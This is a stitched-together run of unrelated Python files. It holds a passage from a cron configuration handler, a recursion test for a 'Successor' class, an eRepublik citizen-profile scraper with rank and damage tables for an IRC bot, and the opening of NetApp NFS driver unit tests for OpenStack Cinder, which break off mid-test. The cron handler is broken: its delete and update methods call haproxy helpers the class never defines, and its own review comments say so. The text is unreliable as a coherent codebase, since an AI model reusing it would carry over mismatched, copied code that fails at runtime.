            self._validate_request(request)
        except exception.BadRequest as e:
            LOG.warn('Bad request: %s' % e)
            raise exception.CronConfigureError(explanation=str(e))

        cmd = request['method']
        msg = request['cron_resource']

        if cmd == 'create_cron':
            try:
                self._create_cron(msg)
            except exception.CronCreateError as e:
                raise exception.CronConfigureError(explanation=str(e))
        elif cmd == 'delete_cron':
            try:
                self._delete_cron(msg)
            except exception.HaproxyDeleteError as e:
                raise exception.CronConfigureError(explanation=str(e))
        elif cmd == 'update_cron':
            try:
                self._update_cron(msg)
            except exception.CronUpdateError as e:
                raise exception.CronConfigureError(explanation=str(e))

    def _create_cron(self, msg, syntax_check=False):
        """Render the cron template for `msg` and write it under dir_path.

        :param msg: cron resource dict; msg['title'] names the output file
        :param syntax_check: when True, run `puppet parser validate` on the
            written file
        :raises TemplateNotFound, exception.CronCreateError
        """
        try:
            output = self.template.render(cron_resource=msg)
        except TemplateNotFound as e:
            raise TemplateNotFound(str(e))
        try:
            if not self.dir_path:
                self.dir_path = '/etc/puppet/modules/cron/'
            cron_name = msg['title']
            file_path = self.dir_path + cron_name
            # BUG FIX: the original called path.exists(), but only `os` is
            # imported at module level, so this raised NameError at runtime.
            if not os.path.exists(file_path):
                with open(file_path, 'a') as f:
                    f.write(output)
        except exception.CronCreateError as e:
            raise exception.CronCreateError(explanation=str(e))
        if syntax_check:
            try:
                self._test_syntax(file_path)
            except exception.ProcessExecutionError as e:
                raise exception.CronCreateError(explanation=str(e))

        LOG.debug("Created the new cron successfully")

    def _delete_cron(self, msg):
        """Delete the cron identified by `msg`.

        NOTE(review): this body still operates on haproxy configuration via
        helpers (_create_lb_deleted_haproxy_cfg etc.) that are not defined
        on this class — it looks copied from a haproxy handler; confirm
        against the worker's other handlers before relying on it.
        """
        LOG.debug("Deleting cron  for NAME:%s USER: %s PROJECT:%s" %
                  (msg['id'], msg['user_id'], msg['project_id']))
        try:
            new_cfg_path = self._create_lb_deleted_haproxy_cfg(msg)
        except exception.HaproxyLBNotExists as e:
            # Nothing to delete: treat as success (best-effort delete).
            LOG.warn('%s', e)
            return
            ##raise exception.HaproxyDeleteError(explanation=str(e))

        try:
            self._test_haproxy_config(new_cfg_path)
        except exception.ProcessExecutionError as e:
            raise exception.HaproxyDeleteError(explanation=str(e))

        rc, backup_path = self._backup_original_cfg()
        if rc != 0:
            raise exception.HaproxyDeleteError(explanation=backup_path)

        rc, strerror = self._replace_original_cfg_with_new(new_cfg_path)
        if rc != 0:
            raise exception.HaproxyDeleteError(explanation=strerror)

        if self._reload_haproxy_cfg(backup_path) != 0:
            e = 'Failed to reload haproxy'
            raise exception.HaproxyDeleteError(explanation=str(e))

        LOG.debug("Deleted the new load balancer successfully")

    def _update_cron(self, msg):
        """Update the cron identified by `msg`.

        NOTE(review): like _delete_cron, this still drives haproxy helper
        methods that are not defined on this class — confirm intent.
        """
        LOG.debug("Updating the haproxy load "
                  "balancer for NAME:%s USER: %s PROJECT:%s" %
                  (msg['uuid'], msg['user_id'], msg['project_id']))

        try:
            lb_deleted_cfg_path = self._create_lb_deleted_haproxy_cfg(msg)
        except exception.HaproxyLBNotExists as e:
            LOG.warn('%s', e)
            raise exception.HaproxyUpdateError(explanation=str(e))

        try:
            new_cfg_path = self._create_lb_haproxy_cfg(
                msg, base_cfg_path=lb_deleted_cfg_path)
        except exception.HaproxyCreateCfgError as e:
            raise exception.HaproxyUpdateError(explanation=str(e))

        try:
            self._test_haproxy_config(new_cfg_path)
        except exception.ProcessExecutionError as e:
            raise exception.HaproxyUpdateError(explanation=str(e))

        LOG.debug("Updated the new load balancer successfully")

    def _validate_request(self, request):
        """Check the incoming request; raises exception.BadRequest when invalid.

        BUG FIX: the original called validate.check_tcp_request(), but no
        `validate` name exists in this module — the imported module is
        `validator` (from hotzenplotz.api import validator).
        """
        validator.check_tcp_request(request)

    def _get_lb_name(self, msg):
        """Return the load-balancer name for `msg` (currently just its uuid)."""
        # TODO(wenjianhn): utf-8 support, base64
        ##return "%s_%s" % (msg['project_id'],
        return "%s" % msg['uuid']

    def _is_lb_in_use(self, lb_name,
                      base_cfg_path='/etc/haproxy/haproxy.cfg'):
        """Return True when `lb_name` appears as a `listen` section in the config."""
        with open(base_cfg_path) as cfg:
            lines = cfg.readlines()

        try:
            in_use_lb_name = [line.split()[1] for line in lines
                              if line.startswith('listen')]
        except IndexError:
            LOG.error("No item was found after listen directive,"
                      "is the haproxy configuraion file valid?")
            raise

        return lb_name in in_use_lb_name

    def _test_syntax(self, cfile_path):
        """Run `puppet parser validate` on `cfile_path`; re-raises on failure."""
        LOG.info('Testing the new puppet configuration file')
        cmd = "puppet parser validate %s" % cfile_path

        try:
            utils.execute(cmd)
        except exception.ProcessExecutionError as e:
            LOG.warn('Did not pass the configuration syntax test: %s', e)
            raise

    def _get_one_lb_info(self, line_all, line_index, line_total):
        """Collect one `listen` section's indented body lines.

        Scans line_all from line_index; returns (index of the next 'listen'
        line, collected tab-indented lines). When no further 'listen' line
        exists, returns (line_total - 1, collected lines).
        """
        value = []

        for i in range(line_index, line_total):
            line = line_all[i]

            if line.startswith('\t'):
                value.append(line)
            elif line.startswith('listen'):
                return i, value

        return line_total - 1, value


from must import MustHavePatterns
from successor import Successor


class TestSuccessor(object):
    """Verify that creating a self-referential Successor blows the recursion limit."""

    @classmethod
    def setup_class(cls):
        # Register Successor once for the whole test class.
        cls.test_patterns = MustHavePatterns(Successor)

    def test_successor(self):
        try:
            self.test_patterns.create(Successor)
        except RuntimeError as re:
            # Expected: infinite recursion while resolving Successor.
            assert str(re).startswith("maximum recursion depth")
        else:
            raise Exception("Recursive structure did not explode.")

#-*- encoding: utf-8 -*-

import csv, math, time, re, threading, sys

try:
    from urllib.request import urlopen
except ImportError:
    from urllib import urlopen

class ErAPI():
    """Scraper/cache of eRepublik citizen data keyed by IRC nick.

    Keeps an in-memory dict (self.data), persisted to a CSV file and
    refreshed by scraping citizen profile pages in background daemon
    threads started from the constructor.
    """

    # Constructor: basic configuration setup; instantiates helper structures
    # and starts the background loader thread.
    def __init__(self):
        self.data = {}
        # Data format: {'XXCiro|BNC': {'id': 123456, 'nick': 'XXCiro', 'level': 49, 'strength': 532.5, 'rank_points': 1233354, 'citizenship': 'Argentina'}}
        
        # Mapping of rank name -> rank points required to reach it
        self.rank_required_points = {
            "Recruit": 0,
            "Private": 15,
            "Private*": 45,
            "Private**": 80,
            "Private***": 120,
            "Corporal": 170,
            "Corporal*": 250,
            "Corporal**": 350,
            "Corporal***": 450,
            "Sergeant": 600,
            "Sergeant*": 800,
            "Sergeant**": 1000,
            "Sergeant***": 1400,
            "Lieutenant": 1850,
            "Lieutenant*": 2350,
            "Lieutenant**": 3000,
            "Lieutenant***": 3750,
            "Captain": 5000,
            "Captain*": 6500,
            "Captain**": 9000,
            "Captain***": 12000,
            "Major": 15500,
            "Major*": 20000,
            "Major**": 25000,
            "Major***": 31000,
            "Commander": 40000,
            "Commander*": 52000,
            "Commander**": 67000,
            "Commander***": 85000,
            "Lt Colonel": 110000,
            "Lt Colonel*": 140000,
            "Lt Colonel**": 180000,
            "Lt Colonel***": 225000,
            "Colonel": 285000,
            "Colonel*": 355000,
            "Colonel**": 435000,
            "Colonel***": 540000,
            "General": 660000,
            "General*": 800000,
            "General**": 950000,
            "General***": 1140000,
            "Field Marshal": 1350000,
            "Field Marshal*": 1600000,
            "Field Marshal**": 1875000,
            "Field Marshal***": 2185000,
            "Supreme Marshal": 2550000,
            "Supreme Marshal*": 3000000,
            "Supreme Marshal**": 3500000,
            "Supreme Marshal***": 4150000,
            "National Force": 4900000,
            "National Force*": 5800000,
            "National Force**": 7000000,
            "National Force***": 9000000,
            "World Class Force": 11500000,
            "World Class Force*": 14500000,
            "World Class Force**": 18000000,
            "World Class Force***": 22000000,
            "Legendary Force": 26500000,
            "Legendary Force*": 31500000,
            "Legendary Force**": 37000000,
            "Legendary Force***": 42000000,
            "God of War": 50000000,
            "God of War*": 100000000,
            "God of War**": 200000000,
            "God of War***": 500000000,
            "Titan": 1000000000,
            "Titan*": 2000000000,
            "Titan**": 4000000000,
            "Titan***": 10000000000}

        # Rank names ordered from lowest to highest seniority; index in this
        # list is used as the rank's numeric position.
        self.rank_to_pos = [
            "Recruit",
            "Private",
            "Private*",
            "Private**",
            "Private***",
            "Corporal",
            "Corporal*",
            "Corporal**",
            "Corporal***",
            "Sergeant",
            "Sergeant*",
            "Sergeant**",
            "Sergeant***",
            "Lieutenant",
            "Lieutenant*",
            "Lieutenant**",
            "Lieutenant***",
            "Captain",
            "Captain*",
            "Captain**",
            "Captain***",
            "Major",
            "Major*",
            "Major**",
            "Major***",
            "Commander",
            "Commander*",
            "Commander**",
            "Commander***",
            "Lt Colonel",
            "Lt Colonel*",
            "Lt Colonel**",
            "Lt Colonel***",
            "Colonel",
            "Colonel*",
            "Colonel**",
            "Colonel***",
            "General",
            "General*",
            "General**",
            "General***",
            "Field Marshal",
            "Field Marshal*",
            "Field Marshal**",
            "Field Marshal***",
            "Supreme Marshal",
            "Supreme Marshal*",
            "Supreme Marshal**",
            "Supreme Marshal***",
            "National Force",
            "National Force*",
            "National Force**",
            "National Force***",
            "World Class Force",
            "World Class Force*",
            "World Class Force**",
            "World Class Force***",
            "Legendary Force",
            "Legendary Force*",
            "Legendary Force**",
            "Legendary Force***",
            "God of War",
            "God of War*",
            "God of War**",
            "God of War***",
            "Titan",
            "Titan*",
            "Titan**",
            "Titan***",]

        # Run flag, useful to manually stop the updater/saver threads.
        self.run = True

        # Data loading is parallelized in a new daemon thread so a premature
        # death of the caller also kills it.
        th = threading.Thread(target=self.data_loader)
        th.daemon = True
        th.start()

    # Loader: loads data and spawns the saver and updater threads; only
    # called from the constructor.
    def data_loader(self):
        self.load_data()

        self.data_saver_th = threading.Thread(target=self.data_saver)
        self.data_saver_th.daemon = True
        self.data_saver_th.start()

        self.data_updater_th = threading.Thread(target=self.data_updater)
        self.data_updater_th.daemon = True
        self.data_updater_th.start()

    # Persists the data to disk every 60 seconds; only called from data_loader.
    def data_saver(self):
        while self.run:
            self.save_data()

            time.sleep(60)

    # Refreshes every known nick (30s apart), then sleeps 10 minutes; only
    # called from data_loader.
    # NOTE(review): iterates self.data while reg_nick_write() on another
    # thread may insert keys — a concurrent insert would raise RuntimeError
    # inside this loop; confirm whether that race matters in practice.
    def data_updater(self):
        while self.run:
            for irc_nick in self.data:
                self.update_data(irc_nick)
                time.sleep(30)

            time.sleep(600)

    # ---------------------------------------------------------------------------------- #
    # @ PUBLIC METHODS                                                                   #
    # ---------------------------------------------------------------------------------- #

    # Reload the in-memory data from the CSV file.
    # Bare except is deliberate best-effort: a missing/corrupt file leaves
    # the current data untouched.
    def load_data(self):
        try:
            f = open('data/er_nick-data.csv', 'rt')
            reader = csv.reader(f)
            for nick_irc,id,nick_er,level,strength,rank_points,citizenship in reader:
                self.data[nick_irc] = {'id': int(id), 'nick': nick_er, 'level': int(level), 'strength': float(strength), 'rank_points': int(rank_points), 'citizenship': citizenship}
            f.close()
        except:
            pass

    # Dump the in-memory data to the CSV file (best-effort, errors ignored).
    def save_data(self):
        try:
            f = open('data/er_nick-data.csv', 'wt')
            writer = csv.writer(f)
            for u in self.data:
                writer.writerow([u, self.data[u]['id'], self.data[u]['nick'], self.data[u]['level'], self.data[u]['strength'], self.data[u]['rank_points'], self.data[u]['citizenship']])
            f.close()
        except:
            pass

    # Scrape the eRepublik profile page for the given IRC nick and refresh
    # its cached fields. Best-effort: any network/parse failure leaves the
    # cached entry unchanged.
    def update_data(self, irc_nick):
        try:
            id = self.data[irc_nick]['id']

            c = urlopen('http://www.erepublik.com/es/citizen/profile/%d' % id)
            page = c.read()
            c.close()

            self.data[irc_nick]['nick'] = re.search('<meta name="title" content="(.+?) - Ciudadano del Nuevo Mundo" \/>', page.decode('utf-8')).group(1)
            self.data[irc_nick]['level'] = int(re.search('<strong class="citizen_level">(.+?)<\/strong>', page.decode('utf-8'), re.DOTALL).group(1))
            self.data[irc_nick]['strength'] = float(re.search('<span class="military_box_info mb_bottom">(.+?)</span>', page.decode('utf-8'), re.DOTALL).group(1).strip('\r\n\t ').replace(',',''))
            self.data[irc_nick]['rank_points'] = int(re.search('<span class="rank_numbers">(.+?) \/', page.decode('utf-8'), re.DOTALL).group(1).replace(',',''))
            self.data[irc_nick]['citizenship'] = re.search('<a href="http\:\/\/www.erepublik.com\/es\/country\/society\/([^ \t\n\x0B\f\r]+?)">', page.decode('utf-8')).group(1)
        except:
            pass

    # Register (or re-bind) an IRC nick to a citizen id and force a refresh.
    def reg_nick_write(self, nick, id):
        if(nick.lower() in self.data.keys()):
            self.data[nick.lower()]['id'] = int(id)
        else:
            self.data[nick.lower()] = {'id': int(id), 'nick': nick, 'level': 1, 'strength': 0, 'rank_points': 0, 'citizenship': ''}

        self.update_data(nick.lower())

    # Return the cached ID for the given IRC nick.
    def get_id(self, nick):
        return self.data[nick.lower()]['id']

    # Return the cached LEVEL for the given IRC nick.
    def get_level(self, nick):
        return self.data[nick.lower()]['level']

    # Return the cached STRENGTH for the given IRC nick.
    def get_strength(self, nick):
        return self.data[nick.lower()]['strength']

    # Return the cached RANK POINTS for the given IRC nick.
    def get_rank_points(self, nick):
        return self.data[nick.lower()]['rank_points']

    # Return the cached CITIZENSHIP for the given IRC nick.
    def get_citizenship(self, nick):
        return self.data[nick.lower()]['citizenship']

    # Return the cached in-game NICK for the given IRC nick.
    def get_nick(self, nick):
        return self.data[nick.lower()]['nick']

    # Return the rank name for a rank-points total: the highest-positioned
    # rank whose threshold is below rank_points.
    def calculate_rank_name(self, rank_points):
        index = 0

        for k in [key for key in self.rank_required_points.keys() if self.rank_required_points[key] < rank_points]:
            if(self.rank_to_pos.index(k) > index):
                index = self.rank_to_pos.index(k)

        return self.rank_to_pos[index]

    # Compute the damage for a hit from rank points, strength, weapon power,
    # level and bonus, using the game's damage formula.
    # NOTE(review): `index / 20` is float division on Python 3 but integer
    # division on Python 2; the urllib import fallback suggests this file
    # targets both — confirm which rounding is intended.
    def calculate_damage(self, rank_points, strength, weapon_power, level, bonus):
        index = 0

        for k in [key for key in self.rank_required_points.keys() if self.rank_required_points[key] < rank_points]:
            if(self.rank_to_pos.index(k) > index):
                index = self.rank_to_pos.index(k)

        return(math.trunc(((index / 20) + 0.3) * ((strength / 10) + 40) * (1 + (weapon_power / 100)) * (1.1 if level > 99 else 1) * bonus))

# Copyright (c) 2012 NetApp, Inc.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.
"""Unit tests for the NetApp-specific NFS driver module."""

from lxml import etree
import mock
import mox
from mox import IgnoreArg
from mox import IsA
import os

from cinder import context
from cinder import exception
from cinder.image import image_utils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.drivers.netapp import api
from cinder.volume.drivers.netapp import nfs as netapp_nfs
from cinder.volume.drivers.netapp import utils


from oslo.config import cfg
CONF = cfg.CONF

LOG = logging.getLogger(__name__)


def create_configuration():
    """Build a mox-mocked Configuration preloaded with NFS mount defaults."""
    mock_config = mox.MockObject(conf.Configuration)
    mock_config.append_config_values(mox.IgnoreArg())
    mock_config.nfs_mount_point_base = '/mnt/test'
    mock_config.nfs_mount_options = None
    return mock_config


class FakeVolume(object):
    """Minimal volume double whose attributes are also reachable by item access."""

    def __init__(self, size=0):
        self.size = size
        self.id = hash(self)
        self.name = None

    def __getitem__(self, key):
        # Item access mirrors attribute storage: fake['size'] == fake.size.
        return vars(self)[key]

    def __setitem__(self, key, val):
        vars(self)[key] = val


class FakeSnapshot(object):
    """Minimal snapshot double exposing its attributes through item lookup."""

    def __init__(self, volume_size=0):
        # All metadata fields start unset; only the size is configurable.
        for attr in ('volume_name', 'name', 'volume_id', 'user_id', 'status'):
            setattr(self, attr, None)
        self.volume_size = volume_size

    def __getitem__(self, key):
        return vars(self)[key]


class FakeResponse(object):
    """Canned API response carrying a status and, on failure, a reason."""

    def __init__(self, status):
        """Initialize FakeResponse.

        :param status: Either 'failed' or 'passed'
        """
        self.Status = status
        if status != 'failed':
            return
        # Failed responses additionally expose a Reason attribute.
        self.Reason = 'Sample error'


class NetappDirectCmodeNfsDriverTestCase(test.TestCase):
    """Test direct NetApp C Mode driver."""
    def setUp(self):
        super(NetappDirectCmodeNfsDriverTestCase, self).setUp()
        self._custom_setup()

    def test_create_snapshot(self):
        """Test snapshot can be created and deleted."""
        mox = self.mox
        drv = self._driver

        mox.StubOutWithMock(drv, '_clone_volume')
        drv._clone_volume(IgnoreArg(), IgnoreArg(), IgnoreArg())
        mox.ReplayAll()

        drv.create_snapshot(FakeSnapshot())

        mox.VerifyAll()

    def test_create_volume_from_snapshot(self):
        """Tests volume creation from snapshot."""
        drv = self._driver
        mox = self.mox
        volume = FakeVolume(1)
        snapshot = FakeSnapshot(1)

        location = '127.0.0.1:/nfs'
        expected_result = {'provider_location': location}
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_get_volume_location')
        mox.StubOutWithMock(drv, 'local_path')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        drv._clone_volume(IgnoreArg(), IgnoreArg(), IgnoreArg())
        drv._get_volume_location(IgnoreArg()).AndReturn(location)
        drv.local_path(IgnoreArg()).AndReturn('/mnt')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all(IgnoreArg())

        mox.ReplayAll()

        loc = drv.create_volume_from_snapshot(volume, snapshot)

        self.assertEqual(loc, expected_result)

        mox.VerifyAll()

    def _prepare_delete_snapshot_mock(self, snapshot_exists):
        """Record the expected delete_snapshot call sequence.

        :param snapshot_exists: when True, also expect the file removal calls.
        :returns: the replayed mox instance, ready for VerifyAll().
        """
        drv = self._driver
        mox = self.mox

        mox.StubOutWithMock(drv, '_get_provider_location')
        mox.StubOutWithMock(drv, '_volume_not_present')
        mox.StubOutWithMock(drv, '_post_prov_deprov_in_ssc')

        if snapshot_exists:
            mox.StubOutWithMock(drv, '_execute')
            mox.StubOutWithMock(drv, '_get_volume_path')
        # NOTE(review): the provider location is expected to be queried twice
        # during deletion — confirm against the driver implementation.
        drv._get_provider_location(IgnoreArg())
        drv._get_provider_location(IgnoreArg())
        drv._volume_not_present(IgnoreArg(), IgnoreArg())\
            .AndReturn(not snapshot_exists)

        if snapshot_exists:
            drv._get_volume_path(IgnoreArg(), IgnoreArg())
            drv._execute('rm', None, run_as_root=True)

        drv._post_prov_deprov_in_ssc(IgnoreArg())

        mox.ReplayAll()

        return mox

    def test_delete_existing_snapshot(self):
        """Deleting an existing snapshot removes the backing file."""
        drv = self._driver
        mox = self._prepare_delete_snapshot_mock(True)

        drv.delete_snapshot(FakeSnapshot())

        mox.VerifyAll()

    def test_delete_missing_snapshot(self):
        """Deleting a missing snapshot skips the file removal."""
        drv = self._driver
        mox = self._prepare_delete_snapshot_mock(False)

        drv.delete_snapshot(FakeSnapshot())

        mox.VerifyAll()

    def _custom_setup(self):
        """Instantiate the C-mode driver under test in proxy mode."""
        kwargs = {}
        kwargs['netapp_mode'] = 'proxy'
        kwargs['configuration'] = create_configuration()
        self._driver = netapp_nfs.NetAppDirectCmodeNfsDriver(**kwargs)

    def test_check_for_setup_error(self):
        """Setup check must fail on unset flags and pass once they are set."""
        mox = self.mox
        drv = self._driver
        required_flags = [
            'netapp_transport_type',
            'netapp_login',
            'netapp_password',
            'netapp_server_hostname',
            'netapp_server_port']

        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, None)
        # check exception raises when flags are not set
        self.assertRaises(exception.CinderException,
                          drv.check_for_setup_error)

        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, 'val')
        setattr(drv, 'ssc_enabled', False)

        mox.StubOutWithMock(netapp_nfs.NetAppDirectNfsDriver, '_check_flags')

        netapp_nfs.NetAppDirectNfsDriver._check_flags()
        mox.ReplayAll()

        drv.check_for_setup_error()

        mox.VerifyAll()

        # restore initial FLAGS
        for flag in required_flags:
            delattr(drv.configuration, flag)

    def test_do_setup(self):
        """do_setup delegates to the base class and the custom setup hook."""
        mox = self.mox
        drv = self._driver

        mox.StubOutWithMock(netapp_nfs.NetAppNFSDriver, 'do_setup')
        mox.StubOutWithMock(drv, '_get_client')
        mox.StubOutWithMock(drv, '_do_custom_setup')

        netapp_nfs.NetAppNFSDriver.do_setup(IgnoreArg())
        drv._get_client()
        drv._do_custom_setup(IgnoreArg())

        mox.ReplayAll()

        drv.do_setup(IsA(context.RequestContext))

        mox.VerifyAll()

    def _prepare_clone_mock(self, status):
        """Record the expected _clone_volume call sequence.

        NOTE(review): *status* is currently unused by this helper — confirm
        whether a FakeResponse based on it was intended.
        """
        drv = self._driver
        mox = self.mox

        volume = FakeVolume()
        setattr(volume, 'provider_location', '127.0.0.1:/nfs')

        mox.StubOutWithMock(drv, '_get_host_ip')
        mox.StubOutWithMock(drv, '_get_export_path')
        mox.StubOutWithMock(drv, '_get_if_info_by_ip')
        mox.StubOutWithMock(drv, '_get_vol_by_junc_vserver')
        mox.StubOutWithMock(drv, '_clone_file')
        mox.StubOutWithMock(drv, '_post_prov_deprov_in_ssc')

        drv._get_host_ip(IgnoreArg()).AndReturn('127.0.0.1')
        drv._get_export_path(IgnoreArg()).AndReturn('/nfs')
        drv._get_if_info_by_ip('127.0.0.1').AndReturn(
            self._prepare_info_by_ip_response())
        drv._get_vol_by_junc_vserver('openstack', '/nfs').AndReturn('nfsvol')
        drv._clone_file('nfsvol', 'volume_name', 'clone_name',
                        'openstack')
        drv._post_prov_deprov_in_ssc(IgnoreArg())
        return mox

    def _prepare_info_by_ip_response(self):
        """Return parsed net-interface-info elements for a canned API reply."""
        res = """<attributes-list>
        <net-interface-info>
        <address>127.0.0.1</address>
        <administrative-status>up</administrative-status>
        <current-node>fas3170rre-cmode-01</current-node>
        <current-port>e1b-1165</current-port>
        <data-protocols>
          <data-protocol>nfs</data-protocol>
        </data-protocols>
        <dns-domain-name>none</dns-domain-name>
        <failover-group/>
        <failover-policy>disabled</failover-policy>
        <firewall-policy>data</firewall-policy>
        <home-node>fas3170rre-cmode-01</home-node>
        <home-port>e1b-1165</home-port>
        <interface-name>nfs_data1</interface-name>
        <is-auto-revert>false</is-auto-revert>
        <is-home>true</is-home>
        <netmask>255.255.255.0</netmask>
        <netmask-length>24</netmask-length>
        <operational-status>up</operational-status>
        <role>data</role>
        <routing-group-name>c10.63.165.0/24</routing-group-name>
        <use-failover-group>disabled</use-failover-group>
        <vserver>openstack</vserver>
      </net-interface-info></attributes-list>"""
        response_el = etree.XML(res)
        return api.NaElement(response_el).get_children()

    def test_clone_volume(self):
        """_clone_volume issues the expected NetApp API call sequence."""
        drv = self._driver
        mox = self._prepare_clone_mock('pass')

        mox.ReplayAll()

        volume_name = 'volume_name'
        clone_name = 'clone_name'
        volume_id = volume_name + str(hash(volume_name))
        share = 'ip:/share'

        drv._clone_volume(volume_name, clone_name, volume_id, share)

        mox.VerifyAll()

    def test_register_img_in_cache_noshare(self):
        """Registering an image caches it against the volume's share."""
        # NOTE(review): identical to test_register_img_in_cache_with_share;
        # the "noshare" variant presumably should differ — confirm intent.
        volume = {'id': '1', 'name': 'testvol'}
        volume['provider_location'] = '10.61.170.1:/share/path'
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')

        drv._do_clone_rel_img_cache('testvol', 'img-cache-12345',
                                    '10.61.170.1:/share/path',
                                    'img-cache-12345')

        mox.ReplayAll()
        drv._register_image_in_cache(volume, '12345')
        mox.VerifyAll()

    def test_register_img_in_cache_with_share(self):
        """Registering an image with a share clones it into the image cache."""
        volume = {'id': '1', 'name': 'testvol'}
        volume['provider_location'] = '10.61.170.1:/share/path'
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')

        drv._do_clone_rel_img_cache('testvol', 'img-cache-12345',
                                    '10.61.170.1:/share/path',
                                    'img-cache-12345')

        mox.ReplayAll()
        drv._register_image_in_cache(volume, '12345')
        mox.VerifyAll()

    def test_find_image_in_cache_no_shares(self):
        """With no mounted shares the cache lookup returns nothing."""
        drv = self._driver
        drv._mounted_shares = []
        result = drv._find_image_in_cache('image_id')
        if not result:
            pass
        else:
            self.fail('Return result is unexpected')

    def test_find_image_in_cache_shares(self):
        """A cached image file is found on a mounted share."""
        drv = self._driver
        mox = self.mox
        drv._mounted_shares = ['testshare']
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(os.path, 'exists')

        drv._get_mount_point_for_share('testshare').AndReturn('/mnt')
        os.path.exists('/mnt/img-cache-id').AndReturn(True)
        mox.ReplayAll()
        result = drv._find_image_in_cache('id')
        (share, file_name) = result[0]
        mox.VerifyAll()
        drv._mounted_shares.remove('testshare')

        if (share == 'testshare' and file_name == 'img-cache-id'):
            pass
        else:
            LOG.warn(_("Share %(share)s and file name %(file_name)s")
                     % {'share': share, 'file_name': file_name})
            self.fail('Return result is unexpected')

    def test_find_old_cache_files_notexists(self):
        """No cache files older than the threshold yields an empty result."""
        drv = self._driver
        mox = self.mox
        cmd = ['find', '/mnt', '-maxdepth', '1', '-name',
               'img-cache*', '-amin', '+720']
        setattr(drv.configuration, 'expiry_thres_minutes', 720)
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(drv, '_execute')

        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        drv._execute(*cmd, run_as_root=True).AndReturn((None, ''))
        mox.ReplayAll()
        res = drv._find_old_cache_files('share')
        mox.VerifyAll()
        if len(res) == 0:
            pass
        else:
            self.fail('No files expected but got return values.')

    def test_find_old_cache_files_exists(self):
        """Old cache files found by `find` are shortlisted for deletion."""
        drv = self._driver
        mox = self.mox
        cmd = ['find', '/mnt', '-maxdepth', '1', '-name',
               'img-cache*', '-amin', '+720']
        setattr(drv.configuration, 'expiry_thres_minutes', '720')
        files = '/mnt/img-id1\n/mnt/img-id2\n'
        r_files = ['img-id1', 'img-id2']
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(drv, '_execute')
        mox.StubOutWithMock(drv, '_shortlist_del_eligible_files')

        drv._get_mount_point_for_share('share').AndReturn('/mnt')
        drv._execute(*cmd, run_as_root=True).AndReturn((files, None))
        drv._shortlist_del_eligible_files(
            IgnoreArg(), r_files).AndReturn(r_files)
        mox.ReplayAll()
        res = drv._find_old_cache_files('share')
        mox.VerifyAll()
        if len(res) == len(r_files):
            for f in res:
                r_files.remove(f)
        else:
            self.fail('Returned files not same as expected.')

    def test_delete_files_till_bytes_free_success(self):
        """Files are deleted largest-first until enough bytes are freed."""
        drv = self._driver
        mox = self.mox
        files = [('img-cache-1', 230), ('img-cache-2', 380)]
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(drv, '_delete_file')

        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        drv._delete_file('/mnt/img-cache-2').AndReturn(True)
        drv._delete_file('/mnt/img-cache-1').AndReturn(True)
        mox.ReplayAll()
        drv._delete_files_till_bytes_free(files, 'share', bytes_to_free=1024)
        mox.VerifyAll()

    def test_clean_image_cache_exec(self):
        """Cache cleaning runs when free space is below the start threshold."""
        drv = self._driver
        mox = self.mox
        drv.configuration.thres_avl_size_perc_start = 20
        drv.configuration.thres_avl_size_perc_stop = 50
        drv._mounted_shares = ['testshare']

        mox.StubOutWithMock(drv, '_find_old_cache_files')
        mox.StubOutWithMock(drv, '_delete_files_till_bytes_free')
        mox.StubOutWithMock(drv, '_get_capacity_info')

        # 19% available < 20% start threshold -> cleaning triggers.
        drv._get_capacity_info('testshare').AndReturn((100, 19, 81))
        drv._find_old_cache_files('testshare').AndReturn(['f1', 'f2'])
        drv._delete_files_till_bytes_free(
            ['f1', 'f2'], 'testshare', bytes_to_free=31)
        mox.ReplayAll()
        drv._clean_image_cache()
        mox.VerifyAll()
        drv._mounted_shares.remove('testshare')
        if not drv.cleaning:
            pass
        else:
            self.fail('Clean image cache failed.')

    def test_clean_image_cache_noexec(self):
        """Cache cleaning is skipped when free space is above the threshold."""
        drv = self._driver
        mox = self.mox
        drv.configuration.thres_avl_size_perc_start = 20
        drv.configuration.thres_avl_size_perc_stop = 50
        drv._mounted_shares = ['testshare']

        mox.StubOutWithMock(drv, '_get_capacity_info')

        # 30% available >= 20% start threshold -> no cleaning calls expected.
        drv._get_capacity_info('testshare').AndReturn((100, 30, 70))
        mox.ReplayAll()
        drv._clean_image_cache()
        mox.VerifyAll()
        drv._mounted_shares.remove('testshare')
        if not drv.cleaning:
            pass
        else:
            self.fail('Clean image cache failed.')

    def test_clone_image_fromcache(self):
        """Cloning an image found in the cache avoids a fresh conversion."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')
        mox.StubOutWithMock(drv, '_post_clone_image')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')

        drv._find_image_in_cache(IgnoreArg()).AndReturn(
            [('share', 'file_name')])
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
